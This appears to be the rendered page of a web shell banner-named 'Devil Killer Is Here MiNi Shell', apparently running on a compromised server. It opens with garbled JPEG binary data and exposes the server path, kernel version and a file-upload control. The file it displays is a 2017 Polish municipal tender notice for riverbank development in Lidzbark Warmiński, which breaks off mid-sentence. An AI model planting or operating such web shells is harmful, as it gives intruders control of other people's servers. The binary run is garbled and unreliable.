JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170105/3210-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://lidzbarkw-um.bip-wm.pl' target='_blank'>http://lidzbarkw-um.bip-wm.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 3210 - 2017
              z dnia 2017-01-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lidzbark Warmiński: Realizacja projektu: Zagospodarowanie brzegów rzeki Łyny od mostu na                              ul. Olsztyńskiej do mostu na ul. Kopernika w Lidzbarku Warmińskim<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego                    w ramach Regionalnego Programu Operacyjnego Województwa Warmińsko-Mazurskiego na lata 2014-2020, Oś priorytetowa 6  Kultura i dziedzictwo, Działanie 6.2  Dziedzictwo naturalne, Poddziałanie 6.2.3  Efektywne wykorzystanie zasobów, na postawie umowy o dofinansowanie Nr UDA-RPWM.06.02.03-28-0001/16-00</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miejska Lidzbark Warmiński, krajowy numer identyfikacyjny
              51074350000000, ul.
              ul. A. Świętochowskiego 
              14,
              11100  
              Lidzbark Warmiński, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              897 678 500, e-mail
              zamowienia@lidzbarkwarminski.pl, faks
              897 672 303.
              <br />
              Adres strony internetowej (URL): http://lidzbarkw-um.bip-wm.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://lidzbarkw-um.bip-wm.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://lidzbarkw-um.bip-wm.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty muszą być sporządzone w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności. Ofertę należy umieścić w zamkniętym opakowaniu, uniemożliwiającym odczytanie  zawartości bez uszkodzenia tego opakowania i złożyć w  wyznaczonym terminie  lub przesłać (liczy się data wpływu do siedziby Zamawiającego) na poniższy adres.  <br />
                Adres:
                <br />Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. Aleksandra Świętochowskiego 14, pok. nr 11.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Realizacja projektu: Zagospodarowanie brzegów rzeki Łyny od mostu na                              ul. Olsztyńskiej do mostu na ul. Kopernika w Lidzbarku Warmińskim<br /><b>Numer referencyjny: </b>GKI.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest realizacja projektu: Zagospodarowanie brzegów rzeki Łyny od 
    mostu na ul. Olsztyńskiej do mostu na ul. Kopernika w Lidzbarku Warmińskim.
2. Przedmiot zamówienia obejmuje wykonanie następujących elementów:
	opaski brzegowe w postaci narzutu kamiennego o łącznej długości 1014,36 m,
	opaski brzegowe w postaci narzutu kamiennego, gr. 50cm, 
	opaski brzegowe w postaci narzutu kamiennego na skarpach stawów, oczyszczenie stawów z namulisk oraz zasypanie połączenia rzeki Łyny ze stawem nr 2,
	przepusty łączące stawy nr 1 i 2 oraz 2 i 3 w system paciorkowy,
	odwodnienie terenu siecią drenarską z odprowadzeniem wód do rzeki Łyny, 
	fontanna typu dry-plaza o średnicy 7m wraz z przyłączami elektroenergetycznym, wodociągowym i kanalizacyjnym, 
	żelbetowe schody skarpowe z okładziną drewnianą  zejście do rzeki Łyny, 
	żelbetowe schody skarpowe z okładziną drewnianą  zejście do stawu nr 1, dowiązanie schodów do istniejącego parkingu przy Lidzbarskim Domu Kultury,
	żelbetowe schody skarpowe z okładziną drewnianą  zejście z ul. Wysokiej Bramy, 
	ciągi piesze o nawierzchni z kostki kamiennej, wydzielone obrzeżami betonowymi na ławie betonowej z oporem, wyposażone w elementy małej architektury (ławki, kosze na śmieci),
	ciąg pieszo-jezdny prowadzący do posesji, znajdującej się na działce 40/11, obręb Lidzbark 7, 
	siłownia plenerowa, pow. ok. 242,50m2, posiadająca 14 stanowisk do ćwiczeń,                          o bezpiecznej nawierzchni poliuretanowej EPDM, ( 7 urządzeń + tablica informacyjna),
	dwa boiska do gry w bule, pow. ok. 2 x 60m2, o nawierzchni z tłucznia granitowego, 
	miejsca wypoczynku na trawie  układ ciągów komunikacyjnych o szer.80cm,                           o nawierzchni z kostki kamiennej, pomiędzy którymi powstaną miejsca wypoczynku obsiane mieszanką traw,
	palenisko o średnicy wewnętrznej 1,5m, 
	pochylnia przy Lidzbarskim Domu Kultury, łącząca poziom ciągu pieszego przy ulicy Słowackiego z ciągiem pieszym usytuowanym przy schodach Lidzbarskiego Domu Kultury,
	widownia plenerowa z elementów prefabrykowanych, wkomponowana w istniejącą skarpę trenową, pięciorzędowa, ze schodami. Liczba miejsc siedzących ok. 180, siedziska z drewna kompozytowego,
	toaleta stacjonarna wraz z przyłączami energetycznym, wodociągowym i kanalizacyjnym  2 szt.,
	miejsca dla toalety przenośnej  3 szt.,
	elementy małej architektury  altana, mostek drewniany, stojaki na rowery, miejsca do gry w szachy, ławki parkowe, kosze na śmieci,
	remont istniejących cieków pod projektowanym ciągiem pieszym wraz z wlotem do rzeki,
	malowanie istniejących garaży oraz przesłonięcie ich roślinnością, w ramach zagospodarowania plant na wysokości ulicy Wysokiej Bramy,
	wejście na Bulwar od strony ul. Wysokiej Bramy,
	monitoring terenu, kamery 4 szt.,
	plac zabaw  urządzenia zabawowe w ilości 13 szt., tablice informacyjne 4 szt., ogrodzenie, 
	elementy małej architektury o funkcji edukacyjnej  tablice informacyjno  edukacyjne 9 szt,
	zagospodarowanie terenu nowymi nasadzeniami i uporządkowaniem zieleni.
3. Przedmiot zamówienia obejmuje również wykonanie pozostałych robót budowlanych, usług                  
    i dostaw, określonych w dokumentacji projektowej i specyfikacjach technicznych wykonania                 
    i odbioru robót budowlanych. Szczegółowy opis przedmiotu zamówienia znajduje się                        
    w dokumentacji projektowej i w specyfikacjach technicznych wykonania i odbioru robót 
    budowlanych, stanowiących załączniki do specyfikacji istotnych warunków zamówienia.
4. Przedmiot zamówienia należy wykonać zgodnie z:
    1) umową, 
    2) z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót 
        budowlanych, z harmonogramem rzeczowo  finansowym, 
    3) obowiązującymi przepisami prawa i normami,  
    4) SIWZ, 
    5) należytą starannością, z aktualną, posiadaną najnowszą wiedzą techniczną, przepisami 
       bhp, p.poż oraz z zasadami doświadczenia zawodowego.
5. Zamawiający, stosownie do art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez 
    Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących czynności 
    w zakresie realizacji zamówienia na roboty budowlane, których wykonanie polega na 
    wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  
    Kodeks pracy (t.j. Dz.U. z 2016 r., poz. 1666).
6. Zamawiający, stosownie do art. 29 ust. 4 ustawy Pzp, określa wymagania związane                      
 z realizacją niniejszego zamówienia, polegające ma obowiązku zatrudnienia co najmniej   
 jednej osoby bezrobotnej w pełnym wymiarze czasu pracy, w rozumieniu ustawy z dnia 20  
 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t.j. Dz. U. z 2016 r. poz.   
 645, z późn. zm.).                        
7. Szczegółowe warunki realizacji wymagań określonych przez Zamawiającego na podstawie 
    art. 29 ust. 3a i art. 29 ust. 4 pkt 1 ustawy Pzp, w szczególności sposób dokumentowania 
    zatrudnienia, uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę 
    wymagań, o których mowa powyżej oraz sankcje z tytułu niespełnienia tych wymagań,                     
    a także rodzaj czynności niezbędnych do realizacji zamówienia, zostały określone w części XX 
    specyfikacji istotnych warunków zamówienia.
8. W przypadku, gdy w dokumentacji projektowej lub w specyfikacjach technicznych wykonania   
    i odbioru robót lub przedmiarach robót opisano wyroby budowlane lub materiały budowlane 
    lub urządzenia przez wskazanie znaków towarowych lub patentów lub pochodzenia, 
    to w odniesieniu do tych wyrobów budowlanych lub materiałów budowlanych lub urządzeń, 
    Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie, innych równoważnych 
    wyrobów budowlanych lub materiałów budowlanych lub urządzeń, pod warunkiem: 
1) zastosowania wyrobów budowlanych lub materiałów budowlanych lub urządzeń 
    o parametrach technicznych i jakościowych nie gorszych niż wyroby budowlane lub 
    materiały budowlane lub urządzenia wskazane w dokumentacji projektowej lub                           
    w specyfikacjach technicznych wykonania i odbioru robót lub w przedmiarach robót,
    2) wykazania, że zastosowane wyroby budowlane lub materiały budowlane lub urządzenia 
        spełniają wymagania określone w dokumentacji projektowej i specyfikacjach technicznych
        wykonania i odbioru robót budowlanych.
    W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, 
    uwiarygodniających te wyroby budowlane lub materiały budowlane lub urządzenia.
    Ciężar udowodnienia równoważności zaoferowanych wyrobów budowlanych lub materiałów 
    budowlanych lub urządzeń, spoczywa na Wykonawcy (zgodnie z art. 30 ust. 5 ustawy).
9. Zgodnie z art. 30 ust. 5 ustawy Zamawiający dopuszcza zastosowanie przez Wykonawców        
    rozwiązań równoważnych w stosunku do rozwiązań opisanych w niniejszej SIWZ. 
    Wykonawca, który w ofercie powoła się na zastosowanie rozwiązań równoważnych 
    opisywanym w SIWZ, jest obowiązany w ofercie wykazać, że oferowane przez niego 
    rozwiązania spełniają wymagania określone przez Zamawiającego.
10. Wymagania dotyczące robót:
   1) wszystkie prace winny być zrealizowane zgodnie z obowiązującymi przepisami prawa, 
       obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, wiedzą techniczną, 
       przepisami bhp, p.poż. oraz zgodnie z poleceniami inspektorów nadzoru inwestorskiego                 
       i zaleceniami i wskazówkami Zamawiającego;
   2) roboty należy prowadzić zgodnie z dokumentacją projektową i specyfikacjami technicznymi 
       wykonania i odbioru robót budowlanych oraz wymogami niniejszej SIWZ;
   3) wszystkie materiały użyte do wykonania przedmiotu zamówienia muszą być w I gatunku 
       jakościowym i wymiarowym oraz muszą posiadać atesty lub aprobaty lub inne dokumenty 
       wymagane prawem budowlanym oraz innymi obowiązującymi przepisami;
   4) ww. dokumenty (atesty, aprobaty, itp.) Wykonawca, któremu zostanie udzielone 
       przedmiotowe zamówienie musi dostarczyć Zamawiającemu na każde jego żądanie. 
       Za koordynację dostaw materiałów, urządzeń i osprzętu niezbędnych do realizacji 
       przedmiotu zamówienia odpowiedzialny jest Wykonawca.
<br /><br /><b>II.5) Główny kod CPV: </b>45242000-5<br /><b> Dodatkowe kody CPV:</b>45246500-8,
                45212140-9,
                45246510-1,
                45212130-6,
                45243300-5,
                45316100-6,
                45332400-7,
                45314000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px"><br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową na kwotę nie niższą niż 1 000 000,00 złotych (słownie: jeden milion złotych).<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże że:

a) wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie    wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie:
	co najmniej dwie roboty budowlane polegające na wykonaniu umocnienia brzegu lub skarpy rzeki lub innego akwenu, w tym co najmniej jedną robotą o wartości nie mniejszej niż 300 000,00 złotych brutto (słownie: trzysta tysięcy złotych brutto),
	co najmniej dwie roboty budowlane polegające na budowie lub przebudowie ciągów pieszych lub pieszo-jezdnych wraz z infrastrukturą towarzyszącą, każda o wartości nie mniejszej niż 250 000,00 złotych brutto (słownie: dwieście pięćdziesiąt tysięcy złotych). 
    Zamawiający dopuszcza spełnienie warunku opisanego w lit. a, w ramach jednego lub 
    kilku zadań inwestycyjnych.
b) dysponuje następującymi osobami skierowanymi przez Wykonawcę do realizacji zamówienia   
    publicznego, odpowiedzialnymi za kierowanie robotami budowlanymi:
 - co najmniej jedną osobą, która będzie pełnić funkcję kierownika budowy, posiadającą 
   uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej   
   hydrotechnicznej, wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub 
   odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie 
   wcześniej obowiązujących przepisów, w zakresie niezbędnym do wykonania przedmiotu 
   zamówienia oraz doświadczenie w sprawowaniu funkcji kierownika budowy lub kierownika 
   robót w realizacji co najmniej dwóch robót budowlanych polegających na wykonaniu 
   umocnienia brzegu lub skarpy rzeki lub innego akwenu, w tym co najmniej jedną robotą                 
   o wartości nie mniejszej niż 300 000,00 zł brutto (słownie: trzysta tysięcy złotych brutto);
- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
   budowlanymi w specjalności inżynieryjnej drogowej, wydane na podstawie aktualnych 
   przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, 
   które zostały wydane na podstawie wcześniej obowiązujących przepisów, w zakresie 
   niezbędnym do wykonania przedmiotu zamówienia oraz doświadczenie w sprawowaniu 
   funkcji kierownika budowy lub kierownika robót w realizacji co najmniej dwóch robót 
   budowlanych;
-  co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
   budowlanymi w specjalności konstrukcyjno-budowlanej, wydane na podstawie aktualnych 
   przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, 
   które zostały wydane na podstawie wcześniej obowiązujących przepisów, w zakresie 
   niezbędnym do wykonania przedmiotu zamówienia oraz doświadczenie w sprawowaniu 
   funkcji kierownika budowy lub kierownika robót w realizacji co najmniej dwóch robót 
   budowlanych;
 - co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
   budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń 
   elektrycznych i elektroenergetycznych, wydane na podstawie aktualnych przepisów ustawy 
   Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały 
   wydane na podstawie wcześniej obowiązujących przepisów, w zakresie niezbędnym do 
   wykonania przedmiotu zamówienia oraz doświadczenie w sprawowaniu funkcji kierownika 
   budowy lub kierownika robót w realizacji co najmniej dwóch robót budowlanych;
- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
   budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, 
   wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, wydane na podstawie 
   aktualnych przepisów ustawy Prawo budowlane lub odpowiadające im ważne uprawnienia 
   budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,                       
   w zakresie niezbędnym do wykonania przedmiotu zamówienia oraz doświadczenie 
   w sprawowaniu funkcji kierownika budowy lub kierownika robót w realizacji co najmniej 
   dwóch robót budowlanych;
-  co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami 
   budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń 
   telekomunikacyjnych, wydane na podstawie aktualnych przepisów ustawy Prawo budowlane 
   lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie 
   wcześniej obowiązujących przepisów, w zakresie niezbędnym do wykonania przedmiotu 
   zamówienia oraz doświadczenie w sprawowaniu funkcji kierownika budowy lub kierownika 
   robót w realizacji co najmniej dwóch robót budowlanych.
   Osoby, o których mowa wyżej i które uzyskały kwalifikacje do wykonywania samodzielnych   
   funkcji technicznych w Rzeczypospolitej Polskiej, muszą być wpisane na listę członków  
   właściwej izby samorządu zawodowego i ubezpieczone od odpowiedzialności cywilnej, co daje 
   im prawo wykonywania samodzielnych funkcji technicznych w budownictwie, zgodnie                   
   z ustawą z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów 
   budownictwa (t.j. Dz.U. z 2016 r., poz. 1725). Uprawnienia budowlane wydane na podstawie 
   aktualnych przepisów, powinny być zgodne z ustawą z dnia 7 lipca 1994 r.  Prawo 
   budowlane (t.j. Dz. U. z 2016 r., poz. 290, z późn. zm.) oraz Rozporządzeniem Ministra 
   Infrastruktury i Rozwoju z dnia 11 września 2014 roku w sprawie samodzielnych funkcji 
   technicznych w budownictwie (Dz.U. z 2014 r., poz. 1278).
   Oprócz osób, o których mowa wyżej, w wykonaniu zamówienia mogą wziąć udział również 
   osoby, będące obywatelami innych niż Rzeczpospolita Polska państw członkowskich Unii 
   Europejskiej, państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, 
   zwanych dalej państwami członkowskimi, spełniający wymagania zawarte w ustawie z dnia 
   7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290, z późn. zm.),                                     
   a w szczególności w art. 12a oraz w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania   
   kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U.                       
    z 2016 r., poz. 65).
    Wymienione w lit. b) osoby nie wyczerpują wymagań dla rzetelnego wypełnienia
    zobowiązań Wykonawcy i powinny być traktowane jako minimalne wymagania
    Zamawiającego. 
Wykonawca uwzględni w ofercie każdą konieczność uzupełnienia zespołu specjalistów
wynikającą z przepisów prawa, decyzji, uzgodnień i porozumień, które są niezbędne do
